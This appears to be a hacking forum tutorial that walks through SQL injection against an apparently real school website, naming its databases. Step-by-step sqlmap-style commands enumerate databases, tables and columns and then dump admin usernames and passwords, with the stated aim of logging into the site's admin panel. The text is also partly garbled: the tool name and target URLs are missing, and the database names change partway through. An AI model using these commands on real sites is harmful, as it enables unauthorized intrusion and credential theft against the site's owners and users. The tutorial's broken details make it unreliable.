Google Dorks To Find Unsecure Web Admin Panels
Search from google dorks and open any site
u will not need username and password to access admin panels
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its a python tool , and it is preloaded in almost every Back Track version
first of all
we need a vulnerable target!
here it is
ok first step is to fatch the databases
command will be like this one
python ./ -u --dbs
-u is stand for which is vulnerable to SQL injection
and --dbs is used for fatching total databases in website :D
ok after completing the process of fataching the databases it will something like that available databases(8) [*]informtion_schema [*]alliedschools_web
now we are going to expoit database alliedschools_web and fatch the tables present in it XD
ok command will change a little bit :-
python ./ -u -D alliedschools_web --tables
here :-
-D and then name of the database from which we want to fatch tables and
--tables is for fatching total table present in the database
after processing we will get the tables present in database "alliedschools_web"
after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus ...... ......
now we are going to fatch the cloumns from table admin of database alliedschools_campus
command is :-
python ./ -u -D alliedschools_campus -T admin --columns
now we will get something like this Database: alliedschools_campus Table : admin [12 columns ] admin_password admin_username admin_email ...... ......
This is the last command to get the admin username and password command is python ./ -u -D alliedschools_campus -T admin -C admin_password, admin_username --dump
and after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ......
Now You Have admin Password of website, Find admin panel and ...xD
Ceridts To : Zero & Team indishell :D
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